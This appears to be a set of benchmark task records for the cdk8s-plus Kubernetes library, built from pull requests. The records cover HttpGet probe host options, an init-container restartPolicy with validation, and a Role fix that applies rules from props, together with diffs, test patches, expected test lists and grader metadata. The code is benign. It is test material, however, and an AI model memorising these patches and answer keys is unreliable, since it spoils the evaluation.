Method: Action.fromHttpGet(container: Container, path: string, options: { port?: number; scheme?: ConnectionScheme; host?: string } = {}) Location: src/_action.ts Inputs: - container – the `Container` whose port may be used as the default when `options.port` is omitted. - path – HTTP request path for the probe. - options – optional object that can contain `port` (number), `scheme` (`ConnectionScheme`), and the newly added `host` (string) to override the target hostname/IP. Outputs: Returns a `k8s.HttpGetAction` object with the fields `path`, `port`, `scheme`, and, if supplied, `host`. Description: Constructs a `HttpGetAction` for a probe, now supporting an explicit `host` override; when omitted the probe targets the pod IP. Interface: HttpGetProbeOptions Location: src/probe.ts Inputs: Extends `ProbeOptions` and includes optional fields: - `scheme?: ConnectionScheme` – the protocol scheme. - **`host?: string`** – the hostname to connect to on the container (defaults to the pod IP if not provided). Outputs: Used as configuration for `fromHttpGet`‑based probes; the `host` value is propagated into the generated `HttpGetAction`. Description: Options object for HTTP GET probes, extended to allow specifying a custom host name/IP for the request.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
{ "num_modified_files": 2, "num_modified_lines": 14, "pr_author": "cdk8s-automation", "pr_labels": [ "auto-approve: Pull requests that should be auto approved" ], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.98, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "easy", "external_urls": [ "https://github.com/sqren/backport" ], "intent_completeness": "complete", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests adding a `host` property to HttpGet probes, requiring updates to the Action.fromHttpGet method and the HttpGetProbeOptions interface. The test patch verifies that the generated probe includes the new `host` field, matching the intended behavior. No mismatches, external dependencies, naming constraints, or ambiguous specifications are present. Therefore the task is well defined and solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, 
"test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
45650d32e941655c00affa4ddf44ec0aaff79545
2024-04-18 07:21:56
cdk8s-team__cdk8s-plus-4045
diff --git a/src/container.ts b/src/container.ts index 28048a6e..e5940b92 100644 --- a/src/container.ts +++ b/src/container.ts @@ -491,6 +491,27 @@ export interface ContainerLifecycle { } +/** + * RestartPolicy defines the restart behavior of individual containers in a pod. + * This field may only be set for init containers, and the only allowed value is "Always". + * For non-init containers or when this field is not specified, + * the restart behavior is defined by the Pod's restart policy and the container type. + * Setting the RestartPolicy as "Always" for the init container will have the following effect: + * this init container will be continually restarted on exit until all regular containers have terminated. + * Once all regular containers have completed, all init containers with restartPolicy "Always" will be shut down. + * This lifecycle differs from normal init containers and is often referred to as a "sidecar" container. + * + * @see https://kubernetes.io/docs/concepts/workloads/pods/sidecar-containers/ + */ +export enum ContainerRestartPolicy { + + /** + * If an init container is created with its restartPolicy set to Always, + * it will start and remain running during the entire life of the Pod. + * For regular containers, this is ignored by Kubernetes. + */ + ALWAYS = 'Always' +} /** * Properties for creating a container. 
*/ @@ -658,6 +679,15 @@ export interface ContainerOpts { * group: 26000 */ readonly securityContext?: ContainerSecurityContextProps; + + /** + * Kubelet will start init containers with restartPolicy=Always in the order with other init containers, + * but instead of waiting for its completion, it will wait for the container startup completion + * Currently, only accepted value is Always + * @see https://kubernetes.io/docs/concepts/workloads/pods/sidecar-containers/ + * @default - no restart policy is defined and the pod restart policy is applied + */ + readonly restartPolicy?: ContainerRestartPolicy; } /** @@ -713,6 +743,11 @@ export class Container { */ public readonly env: Env; + /** + * The restart policy of the container. + */ + public readonly restartPolicy?: ContainerRestartPolicy; + private readonly _command?: readonly string[]; private readonly _args?: readonly string[]; private readonly _ports: ContainerPort[] = []; @@ -759,6 +794,7 @@ export class Container { this.imagePullPolicy = props.imagePullPolicy ?? ImagePullPolicy.ALWAYS; this.securityContext = new ContainerSecurityContext(props.securityContext); this.env = new Env(props.envFrom ?? [], props.envVariables ?? {}); + this.restartPolicy = props.restartPolicy; if (this.portNumber) { this.addPort({ @@ -922,6 +958,7 @@ export class Container { preStop: this._lifecycle.preStop?._toKube(this), } : undefined, resources: resourceRequirements, + restartPolicy: this.restartPolicy, securityContext: this.securityContext._toKube(), }; } diff --git a/src/pod.ts b/src/pod.ts index db6ea332..c7f4ea6b 100644 --- a/src/pod.ts +++ b/src/pod.ts @@ -190,6 +190,10 @@ export abstract class AbstractPod extends base.Resource implements IPodSelector, const initContainers: k8s.Container[] = []; for (const cont of this.containers) { + // check if restartPolicy is defined for containers + if (cont.restartPolicy) { + throw new Error(`Invalid container spec: ${cont.name} has non-empty restartPolicy field. 
The field can only be specified for initContainers`); + } // automatically add volume from the container mount // to this pod so thats its available to the container. for (const mount of cont.mounts) {
feat(container): support `restartPolicy` field (#3812) # Backport This will backport the following commits from `k8s-29/main` to `k8s-28/main`: - [feat(container): support `restartPolicy` field (#3812)](https://github.com/cdk8s-team/cdk8s-plus/pull/3812) <!--- Backport version: 8.5.0 --> ### Questions ? Please refer to the [Backport tool documentation](https://github.com/sqren/backport)
**Title** Add support for `restartPolicy` on init containers **Problem** Users cannot declare a restart policy for init containers, limiting the ability to run side‑car‑style init containers that stay alive for the pod’s lifetime. The API also does not enforce that this field is only applicable to init containers, leading to potential misconfiguration. **Root Cause** The container abstraction lacked a `restartPolicy` property and the pod composition logic did not validate its usage. **Fix / Expected Behavior** - Introduce a dedicated enum representing the allowed restart policy value. - Expose an optional `restartPolicy` option on container configuration, defaulting to undefined. - Store the value on the container instance and emit it in the generated Kubernetes manifest. - Enforce at pod synthesis time that `restartPolicy` may only be set on init containers, throwing a clear error otherwise. - Preserve existing behavior for containers without this option. **Risk & Validation** - Ensure that adding the field does not alter manifests for containers that omit it. - Verify that the new validation triggers only for non‑init containers and does not affect valid init container configurations. - Run the full test suite and manually inspect generated pod specs to confirm correct inclusion of the `restartPolicy` field.
4,045
cdk8s-team/cdk8s-plus
diff --git a/test/__snapshots__/container.test.ts.snap b/test/__snapshots__/container.test.ts.snap index 5271e331..c94d5044 100644 --- a/test/__snapshots__/container.test.ts.snap +++ b/test/__snapshots__/container.test.ts.snap @@ -1,5 +1,79 @@ // Jest Snapshot v1, https://goo.gl/fbAQLP +exports[`Container "restartPolicy" property can be used to define restartPolicy 1`] = ` +Array [ + Object { + "apiVersion": "v1", + "kind": "Pod", + "metadata": Object { + "labels": Object { + "cdk8s.io/metadata.addr": "test-Pod-c815bc91", + }, + "name": "test-pod-c890e1b8", + }, + "spec": Object { + "automountServiceAccountToken": false, + "containers": Array [ + Object { + "image": "foo", + "imagePullPolicy": "Always", + "name": "main", + "resources": Object { + "limits": Object { + "cpu": "1500m", + "memory": "2048Mi", + }, + "requests": Object { + "cpu": "1000m", + "memory": "512Mi", + }, + }, + "securityContext": Object { + "allowPrivilegeEscalation": false, + "privileged": false, + "readOnlyRootFilesystem": true, + "runAsNonRoot": true, + }, + }, + ], + "dnsPolicy": "ClusterFirst", + "hostNetwork": false, + "initContainers": Array [ + Object { + "image": "bar", + "imagePullPolicy": "Always", + "name": "init-0", + "resources": Object { + "limits": Object { + "cpu": "1500m", + "memory": "2048Mi", + }, + "requests": Object { + "cpu": "1000m", + "memory": "512Mi", + }, + }, + "restartPolicy": "Always", + "securityContext": Object { + "allowPrivilegeEscalation": false, + "privileged": false, + "readOnlyRootFilesystem": true, + "runAsNonRoot": true, + }, + }, + ], + "restartPolicy": "Always", + "securityContext": Object { + "fsGroupChangePolicy": "Always", + "runAsNonRoot": true, + }, + "setHostnameAsFQDN": false, + "terminationGracePeriodSeconds": 30, + }, + }, +] +`; + exports[`Container "startupProbe" property has defaults if port is provided 1`] = ` Array [ Object { diff --git a/test/container.test.ts b/test/container.test.ts index eccb9ba7..4d570d58 100644 --- 
a/test/container.test.ts +++ b/test/container.test.ts @@ -1,7 +1,7 @@ import * as cdk8s from 'cdk8s'; import { Size, Testing } from 'cdk8s'; import * as kplus from '../src'; -import { Container, Cpu, Handler, ConnectionScheme, Probe, k8s } from '../src'; +import { Container, Cpu, Handler, ConnectionScheme, Probe, k8s, ContainerRestartPolicy } from '../src'; describe('EnvValue', () => { @@ -536,6 +536,26 @@ describe('Container', () => { expect(container).not.toHaveProperty('startupProbe'); }); + test('"restartPolicy" property can be used to define restartPolicy', () => { + // GIVEN + const chart = Testing.chart(); + const pod = new kplus.Pod(chart, 'Pod'); + + // WHEN + pod.addContainer({ image: 'foo' }); + pod.addInitContainer({ + image: 'bar', + restartPolicy: ContainerRestartPolicy.ALWAYS, + }); + + // THEN + const manifest = Testing.synth(chart); + expect(manifest).toMatchSnapshot(); + const container = manifest[0].spec.initContainers[0]; + + expect(container.restartPolicy).toEqual('Always'); + }); + test('"readiness", "liveness", and "startup" can be used to define probes', () => { // GIVEN const container = new kplus.Container({ diff --git a/test/pod.test.ts b/test/pod.test.ts index 9378cb28..977e64da 100644 --- a/test/pod.test.ts +++ b/test/pod.test.ts @@ -1,7 +1,7 @@ import { Testing, ApiObject, Duration } from 'cdk8s'; import { Node } from 'constructs'; import * as kplus from '../src'; -import { DockerConfigSecret, FsGroupChangePolicy, Probe, k8s, RestartPolicy } from '../src'; +import { DockerConfigSecret, FsGroupChangePolicy, Probe, k8s, RestartPolicy, ContainerRestartPolicy } from '../src'; test('defaults', () => { @@ -1556,4 +1556,13 @@ test('custom termination grace period - minutes', () => { const manifest = Testing.synth(chart); const spec = manifest[0].spec; expect(spec.terminationGracePeriodSeconds).toEqual(120); -}); \ No newline at end of file +}); + +test('Containers should not specify "restartPolicy" field', () => { + const chart = 
Testing.chart(); + new kplus.Pod(chart, 'Pod', { + containers: [{ image: 'image', restartPolicy: ContainerRestartPolicy.ALWAYS }], + }); + expect(() => Testing.synth(chart)).toThrowError(); +}); +
[ "Can add only resource requests", "Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only limits and requests on emphemeral-storage", "Can add only limits on emphemeral-storage", "default security context", "custom security context", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", "cannot configure identical ports and protocols at instantiation", "can configure identical ports with different protocols at instantiation", "cannot add an already existing port number with identical protocol", "can add an already existing port number with a different protocol", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Instantiation properties are all respected", "Must use container props", "Can add environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "can mount container to a pv", "mount options", "mount from ctor", "\"startupProbe\" property has defaults if port is provided", "\"startupProbe\" property is undefined if port is not provided", "\"restartPolicy\" property can be used to define restartPolicy", "\"readiness\", \"liveness\", and \"startup\" can be used to define probes", "Can add resource limits 
and requests", "fails with two volumes with the same name", "fails adding a volume with the same name", "fails with a container that has mounts with different volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing container post instantiation", "Must have at least one container", "Can add volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "can specify init containers at instantiation", "can add init container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "custom host aliases", "default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to docker registry", "auto mounting token defaults to true", "can select pods", "can pass an existing secret as the docker auth", "can add hostNetwork to pod", "pod hostNetwork is not added by default", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "Containers should not specify \"restartPolicy\" field", "only NO_EXECUTE taint queries can specify eviction", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an unmanaged pod - default", "can be co-located with an unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", "can be separated from an unmanaged pod - custom", "can allow to ip block", "can isolate pod", "can allow to managed pod", "can allow to managed workload resource", 
"can allow to pods selected without namespaces", "can allow to pods selected with namespaces selected by names", "cannot allow to pods selected with namespaces selected by labels", "cannot allow to pods selected in all namespaces", "can allow to all pods", "can allow to managed namespace", "can allow to namespaces selected by name", "cannot allow to namespaces selected by labels", "can allow to peer across namespaces", "can allow to multiple peers", "cannot allow to the same peer twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from managed pod", "can allow from managed workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "cannot allow from pods selected with namespaces selected by labels", "cannot allow from pods selected in all namespaces", "can allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "cannot allow from namespaces selected by labels", "can allow from peer across namespaces", "can allow from multiple peers", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define namespaces", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod isolation creates only egress policy on pod", "allow from defaults to peer container ports", "can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", "can grant read permissions to workload", "can grant read permissions twice with different subjects", "cannot grant permissions twice with same subject" ]
[ "can grant permissions on imported", "defaults", "custom", "can be imported", "can be bounded to a volume at instantiation", "can be bounded to a volume post instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice to different volumes", "default child", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "Can be isolated", "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname", "defaultChild", "minimal definition", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", "giving access to a single pod and all pods still gives access to all pods", "can be allowed read access to all pods and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific resource and a resource type", "with a custom non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a specific resource, a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added", "fromCommand", "fromHttpGet", "fromTcpSocket", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "StatefulSet gets defaults", "StatefulSet allows overrides", "Synthesizes spec lazily", "default update strategy", "custom update strategy", "can create a RoleBinding from a Role", "can create a RoleBinding from a ClusterRole", "can call bindInNamespace multiple times", "can create a ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a RoleBinding after creating it", "volume name is trimmed if needed", "custom volume name", "default mode", "optional", "items", "items are sorted by key for deterministic synthesis", "items are sorted by key 
for determinstic synthesis", "default medium", "memory medium", "size limit", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can be used to add data", "addData() and addBinaryData() throw if key already used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "IngressClassName can be set", "fromResource", "if the service exposes a port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly specified, and the service is exposed through a different port", "service exposes a single port and its the same as the backend", "service exposes multiple ports and the backend uses one of them", "fails if backend does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", "addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", "addDefaultBackend()", "using addDefaultBackend()", "defaultBackend and rules", "two rules for the same path (no host)", "two rules for the same path and host", "role can bind to imported", "secrets can be added to the service account", "auto mounting token can be disabled", "Can be imported from secret name", "Can create a new secret", "Can add data to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", "Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", 
"can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", "can override the name of a DockerConfig secret", "default immutability", "can configure an immutable generic secret", "can configure an immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable service account token secret", "can configure an immutable tls secret", "can configure an immutable docker config secret", "targets a deployment that has containers with volume mounts", "default configuration", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling strategies, when provided a scaleUp strategy of Max and scaleDown strategy of Min", "creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with external metric, when provided a Metric.external()", "creates HPA with object metric, when provided a Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA with Resource CPU metric, when provided a Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a Metric.resourceMemory()", "creates HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource CPU metric 
targeting 70% average utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting the exact value of 29.5, when provided a MetricTarget.value()", "creates HPA, when target is a deployment", "creates HPA, when target is a StatefulSet", "creates HPA, when minReplicas is same as maxReplicas", "creates HPA with expected spec, when metrics, scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "throws error at synth, when metrics are not provided and target container does not have resource constraints specified", "throws error, when minReplicas is more than maxReplicas", "throws error, when scaleUp.stabilizationWindow is more than 1 hour", "throws error, when scaleDown.stabilizationWindow is more than 1 hour", "throws error, when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 minutes", "throws error, when scaleUp policy has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set to -10 minutes", "throws error, when scaleDown policy has a duration set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at synth, when StatefulSet target has replicas defined", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved twice", "can be bound to a claim at instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to the 
same claim", "throws if bounded twice to different claims", "custom configuration", "can select namespaces", "can select all namespaces", "Can mutate metadata", "Allows setting all options", "Applies default restart policy to pod spec", "Does not modify existing restart policy of pod spec", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can create a policy for a managed pod", "can create a policy for a managed workload resource", "can create a policy for selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", "can create a policy that denies all egress by default", "cannot create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy namespace defaults to selector namespace", "can add ingress from an ip block", "can add ingress from a managed pod", "can add ingress from a managed workload resource", "can add ingress from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected with namespaces selected by names", "can add ingress from all pods", "can add ingress from managed namespace", "can add ingress from selected namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress to pods selected with namespaces selected by labes", "can add egress to pods selected with namespaces selected by names", "can add egress to all pods", "can add egress to managed namespace", "can add egress to selected namespaces", "can add 
egress to all namespaces", "Must be configured with at least one port", "Can provide cluster IP", "can select a deployment", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a LoadBalancer type", "can be exposed by an ingress", "Can be exposed as via ingress", "Expose uses the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and maxUnavailable", "throws is maxSurge and maxUnavailable is set to zero for rolling update", "PercentOrAbsoulte zero", "default minReadySeconds", "default progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", "exposing via a service preserves deployment namespace", "expose captures all container ports", "cannot expose with a port not owned by the container", "expose via service with multiple ports throws error when names are not provided", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - default", "can be spread - custom", "spread set to true", "can be separated from a managed deployment - default", "can be separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an 
unmanaged deployment - custom" ]
Enum: ContainerRestartPolicy Location: src/container.ts Inputs: – (enum members) Outputs: string values representing Kubernetes restart policy for init containers. Currently only `ALWAYS = 'Always'`. Description: Enum used to specify the `restartPolicy` field on init containers. The only supported value is `ALWAYS`, which maps to the Kubernetes value `"Always"` and is allowed only for init containers (treated as side‑car containers). Method: Pod.addInitContainer Location: src/pod.ts (method of class `Pod` / abstract base `AbstractPod`) Inputs: - `props: ContainerProps & { readonly restartPolicy?: ContainerRestartPolicy }` – container configuration for the init container; `restartPolicy` is optional and must be one of the `ContainerRestartPolicy` enum values (currently only `ALWAYS`). Outputs: `Container` – the created init‑container object that is added to the pod’s `initContainers` list. Description: Adds an init container to the pod. When a `restartPolicy` is supplied it is propagated to the underlying Kubernetes manifest; the only accepted value is `ALWAYS`, which causes the init container to be restarted continuously until the pod’s regular containers finish. Constructor / validation (implicit interface change) Location: src/pod.ts (inside the `Pod` constructor or `AbstractPod` init logic) Inputs: `containers: ContainerProps[]` – list of regular containers passed to the pod definition; each element may now include an optional `restartPolicy?: ContainerRestartPolicy`. Outputs: Throws `Error` if any regular container includes a non‑empty `restartPolicy` field. Description: Enforces the rule that `restartPolicy` can be set only on init containers. If a regular container specifies it, pod synthesis fails with an informative error, as verified by the test case.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
{ "num_modified_files": 2, "num_modified_lines": 41, "pr_author": "cdk8s-automation", "pr_labels": [ "auto-approve: Pull requests that should be auto approved" ], "llm_metadata": { "code": "B4", "code_quality": null, "confidence": 0.92, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": true, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [ "https://github.com/sqren/backport", "https://github.com/cdk8s-team/cdk8s-plus/pull/3812" ], "intent_completeness": "partial", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests adding support for a `restartPolicy` field on containers, essentially a feature addition. The provided tests check that init containers can set this field, that the generated manifest includes it, and that setting it on regular containers throws an error, which is not described in the issue text. This mismatch shows the specification is incomplete, leading to an ambiguous spec (B4). 
Tests otherwise align with the intended behavior, so no other B‑category problems are present.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [ "Tests expect an error when `restartPolicy` is set on non‑init containers, a requirement not mentioned in the issue description" ], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
6bbed4a739b5aa35f6a396a57e2a2e36893cd56b
2024-04-18 07:26:13
cdk8s-team__cdk8s-plus-4046
diff --git a/src/role.ts b/src/role.ts index bdf4eb93..0da4b118 100644 --- a/src/role.ts +++ b/src/role.ts @@ -104,6 +104,10 @@ export class Role extends base.Resource implements IRole { metadata: props.metadata, rules: Lazy.any({ produce: () => this.synthesizeRules() }), }); + + for (const rule of props.rules ?? []) { + this.allow(rule.verbs, ...rule.resources); + } } /** @@ -546,4 +550,4 @@ export class ClusterRole extends base.Resource implements IClusterRole, IRole { return { clusterRoleSelectors: [{ matchLabels: this._labelSelector }] }; } -} \ No newline at end of file +}
fix(role): use rules coming from the roleProps (#3813) # Backport This will backport the following commits from `k8s-29/main` to `k8s-27/main`: - [fix(role): use rules coming from the roleProps (#3813)](https://github.com/cdk8s-team/cdk8s-plus/pull/3813) <!--- Backport version: 8.5.0 --> ### Questions ? Please refer to the [Backport tool documentation](https://github.com/sqren/backport)
**Title** Fix Role to honor rules supplied via `roleProps` **Problem** When a Role is instantiated with an explicit `rules` array, those rules are not reflected in the resulting Kubernetes Role manifest. This omission can lead to missing permissions for workloads that rely on the declared rules. **Root Cause** The constructor ignored the `rules` property from the supplied props, only generating rules lazily without registering the user‑provided entries. **Fix / Expected Behavior** - The constructor now processes any `rules` provided in the props and registers them through the existing `allow` mechanism. - Registered rules become part of the lazily synthesized rule set, appearing in the final Role manifest. - If no rules are supplied, the behavior remains unchanged. - Existing deduplication and merging logic continues to apply to the newly added rules. **Risk & Validation** - Run the full test suite to ensure no regression for Roles without explicit rules. - Add/verify tests that a Role created with `rules` in props outputs those rules correctly in the manifest. - Confirm that other RBAC resources (ClusterRole, etc.) are unaffected by the change.
4,046
cdk8s-team/cdk8s-plus
diff --git a/test/role.test.ts b/test/role.test.ts index d63180de..e2314754 100644 --- a/test/role.test.ts +++ b/test/role.test.ts @@ -154,6 +154,32 @@ Array [ }); + test('specify access from props', () => { + + // GIVEN + const chart = Testing.chart(); + + // WHEN + new kplus.Role(chart, 'my-role', { + rules: [ + { + verbs: ['get', 'list', 'watch'], + resources: [kplus.ApiResource.PODS], + }, + ], + }); + + // THEN + const manifest = Testing.synth(chart); + expect(manifest[0].rules).toEqual(expect.arrayContaining([ + { + apiGroups: [''], + resources: ['pods'], + verbs: ['get', 'list', 'watch'], + }, + ])); + }); + test('giving access to a single pod and all pods still gives access to all pods', () => { // GIVEN @@ -546,4 +572,4 @@ Object { }); -}); \ No newline at end of file +});
[ "specify access from props" ]
[ "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname", "defaultChild", "defaults", "can select namespaces", "can select all namespaces", "default child", "custom", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "Can be isolated", "can grant permissions on imported", "role can bind to imported", "minimal definition", "secrets can be added to the service account", "auto mounting token can be disabled", "Can mutate metadata", "Allows setting all options", "Applies default restart policy to pod spec", "Does not modify existing restart policy of pod spec", "Synthesizes spec lazily", "Can add only resource requests", "Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only limits and requests on emphemeral-storage", "Can add only limits on emphemeral-storage", "default security context", "custom security context", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", "cannot configure identical ports and protocols at instantiation", "can configure identical ports with different protocols at instantiation", "cannot add an already existing port number with identical protocol", "can add an already existing port number with a different 
